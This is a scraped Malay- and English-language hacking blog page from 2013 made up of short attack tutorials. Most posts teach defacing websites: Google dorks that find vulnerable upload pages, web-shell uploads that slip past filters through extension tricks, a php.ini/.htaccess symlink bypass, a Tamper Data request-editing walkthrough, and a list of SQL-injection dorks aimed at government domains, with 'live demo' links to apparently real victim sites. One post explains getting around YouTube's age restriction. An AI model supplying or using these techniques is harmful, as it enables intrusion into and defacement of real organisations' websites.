This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Thursday, 21 March 2013

Bypass 18+ Di Dalam Youtube

20:33    No comments

Rujuk gambar di bawah

Mesti korang pernah kene bende ni kan ? so macam mana nak bypass ?

Ok . Jum mulakan .

Ok . korang tengok Link dia macam ni

Link:
http://www.youtube.com/watch?v=1Lu0qhRrIow .Korang ambil ID video tu sahaja 1Lu0qhRrIow

Korang ambil Link NI

http://www.youtube.com/v/Masukan ID?fs=1&amp

Di tempat "Masukan ID" korang masukan ID video yang diblock tadi

Contoh Untuk Link Video di Atas :

http://www.youtube.com/v/1Lu0qhRrIow?fs=1&amp

Masukkan Dalam Address bar dan enjoy the video .

Read More

Cara Deface Hack Website File Upload Shell

20:31    No comments



Assalamualaikum dan salam sejahtera. Hari ni HMCA nak ajar exploit SelectSurvey CMS. CMS ini adalah dari ASP.NET.
Exploit ini membolehkan korang upload shell .asp.

Ok jom mula.

1. Mula-mula cari website vuln dengan google dork :

"SelectSurvey.NETv4 site:uk"
"SelectSurvey.NETv4"

note : main2 dengan dork untuk dapat result yang banyak.

2. Pilih salah satu website dari result.

3. Tambah di hujung url website yang korang pilih :

/survey/UploadImagePopup.aspx

atau jika website tersebut menggunakan subdomain, url akan jadi macam ni :

http://survey.site.com/UploadImagePopup.aspx

Selepas itu, paparan website tu akan jadi lebih kurang macam ni :



Click Choose File dan pilih shell.asp korang.
Kemudian Upload.

note : dapatkan shell asp.rujuk entry INI

3. Kalau berjaya, akan keluar macam ini :




Kalau tak berjaya, korang tukar extension shell jadi shell.asp.jpg atau extension lain.Kalau tak boleh jugak, cari website lain.

4. Ok sekarang masa untuk tengok hasil shell yang dah di upload.
Cuma tambah di hujung url :

http://www.site.com/UploadedImages/shell.asp
shell.asp tu adalah nama shell korang.


Itu saja selamat berjaya :D


Live Demo :

https://intranet.yorksj.ac.uk/Survey/UploadImagePopup.aspx
http://survey.mywisenet.com.au/UploadImagePopup.aspx

Read More

Tutorial Bypass Symlink Forbidden

20:27    No comments




Assalamualaikum dan salam sejahtera. hari ni HMCA nak ajar cara nakbypass symlink forbidden.mesti korang pernah dapat symlink penat2, tiba2 bila nak bukak file config tu keluar forbidden kan?
Macam ni :





Mesti bengang gila la hahaha..ok jangan risau jom aku ajar cara nak bypass :)

1. Mula-mula buat satu file php.ini .
Copy code dibawah :


safe_mode=OFF
disable_functions=NONELepas tu paste dalam notepad dan save as

name : php.ini
File type : all file


2. Kemudian kita buat file .htaccess .
Copy code dibawah :

Options FollowSymLinks MultiViews Indexes ExecCGIPaste dalam notepad dan save as
name : .htaccess
File type : all file

3. Seterusnya korang cuma perlu upload ke dalam directory yang ada file config symlink korang tadi.Upload guna shell la xD
Dengan ini symlink korang akan di-bypass :D

Kalau tak berjaya, upload dekat directory public_html

Itu saja step dia...senang kan? selamat berjaya

Read More

Sunday, 3 March 2013

phUploader Remote File Upload Vulnerability

09:19    No comments

Google Dork : intitle:Powered By phUploader

Go to Google.com and enter this DOrk, see serach results
Exploit URL :
http://{site.comt}/ path/upload.php
 or
http://site.com/upload.php

select any website and upload your file there
website allow to upload .jpg .png .gif anf .png files only
anyway you can upload your deface in .jpg and mirrOr website like
zone-h accept it as defcaement, if want to upload a shell then upload as
shell.php.jpg
after uploading your file you'll got a message
Your file(s) have been uploaded!

see the Link Below this message For view Your uploaded File

Live Demo ~ http://humortshirtzone.com/phUploader.php
Uploaded File ~ http://www.humortshirtzone.com/uploads/1321616908.jpg
- See more at: http://cehtrick.blogspot.com/2013/01/phuploader-remote-file-upload.html#sthash.neWQhKKn.dpuf

Read More

Image Upload Vulnerabilities

09:11    1 comment

Image Upload Vulnerabilities
Dork: inurl:/editor/tmedit/popups
Exploit Path : /editor/tmedit/popups/InsertFile/insert_file.php

There You Can Upload Shell As Image.
Then Your Shell link Will’be like http://vulnrablesite.com/images/yourfilehere
 Find Different Directories To Find Out Your Shell :)
ASP Shell Upload How To Hack ASP Sites. First You Need To Find The Website Upload Path to Upload Shell.For That Use Google Dorks. Google Dorks:




You Can Use "allinurl" Instead of "Inurl" In Google Dorks.
Shell Format: Formats:
 shell.asp;me.jpg
shell.asp
shell.asp.jpg
shell.asp.jpg - See more at: http://www.defencexposure.com/2012/06/image-upload-vulnerabilities.html#sthash.nHaZTWeu.dpuf

Read More

sql vuln gov

09:10    7 comments 


inurl:index.php?id= site:*gov.pl
inurl:index.php?id= site:*gov
inurl:news.php?id= site:*gov.af
inurl:oferta.php?id= site:*gov.af
inurl:trainers.php?id= site:*gov.pl
inurl:article.php?ID= site:*gov.uk
inurl:play_old.php?id= site:*gov.au
inurl:declaration_more.php?decl_id= site:*gov.in
inurl:Pageid= site:*gov
inurl:pagina.php?left= site:*.gov.au
inurl:layout.php?id=120'= site:*gov.pl
inurl:principal.php?id=123'= site:*gov.uk
inurl:standard.php?base_dir= site:*gov
inurl:home.php?where= site:*gov.pl
inurl:page.php?sivu= site:*.pl
inurl:*inc*.php?adresa= site:*gov
inurl:padrao.php?str= site:*gov
inurl:include.php?my= site:*.gov.af
inurl:show.php?home= site:*gov.br
inurl:index.php?lid=20= site:*gov.au 
inurl:principal.php?id=30= site:*gov
inurl:file.php?id=205= site:*gov.au
inurl:info.php?id=25155= site:*gov.af
inurl:enter.php?id=203= site:*gov.uk
inurl:general.php?id=50= site:*gov
inurl:principal.php?id=705= site:*gov.za
inurl:standard.php?id=303= site:*.gov.ie
nurl:nota.php?v= site:*gov.bc.ca
inurl:home.php?str= site:*ed.gov
inurl:press.php?panel= site:*gov.mu
inurl:page.php?mod= site:*gov
inurl:default.php?param= site:*gov
inurl:down*.php?texto= site:*go.af
inurl:mod*.php?dir= site:*gov.ie
inurl:view.php?where= site:*gov.za
inurl:blank.php?subject= site:*gov.br
inurl:path.php?play= site:*gov.uk
inurl:base.php?l= site:*gov.au
CATEGORIES: 
- See more at: http://voice0fblackhat.blogspot.com/2012/01/sqli-dork-for-gov.html#sthash.owINqw1u.dpuf

Read More

Shell Upload Via Tamper Data

09:10    No comments

Hello Hackerz!!

Sometimes You're In Trouble Of Uploading Shell In The Server With The "shell.php" Format. So Here's The Solution.



Let's Have A Look. 
At First  Install Add-on "Tamper Data" In Mozilla Firefox. Go Here For Tamper Data.



Now Change The Shell Name Into ".jpg Format" Like This,



shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;


Now Go To The Uploader URL. Let The Uploader URL:

http://www.targetsite.com/upload.php




Now Select Your Shel In The Above format But To Select The Upload Button. Because Before That You've To Configure Tamper Data. Open Tamper Data From Mozilla.

Firefox > Tools > Tamper Data.

So Let's Have A Look:

  




Now You've To Click "Start Tamper" From Tamper Data Window And Start Tampering. Before Tampering Close All Other Tabs.

Now Click Upload Button From Your Target Site To Upload Your Shell.

Now You should Get Tamper Request With Your Target Site. Click Tamper.



 Now You Should Get "Tamper Popup" Window. From Here You've To Change Your Shell Format Into  ".php".








At The Right Side Have A Look At "Post Parameter Value" Section And Find Your Shell Name. Change It Like "shell.php" And Press Ok.

Great!!

Now Submit.

All Is Done.

Now Got To Your Shell And Deface It :D :D
- See more at: http://www.defencexposure.com/2013/01/shell-upload-via-tamper-data.html#sthash.tIzbXV3l.dpuf

Read More
Subscribe to: Posts (Atom)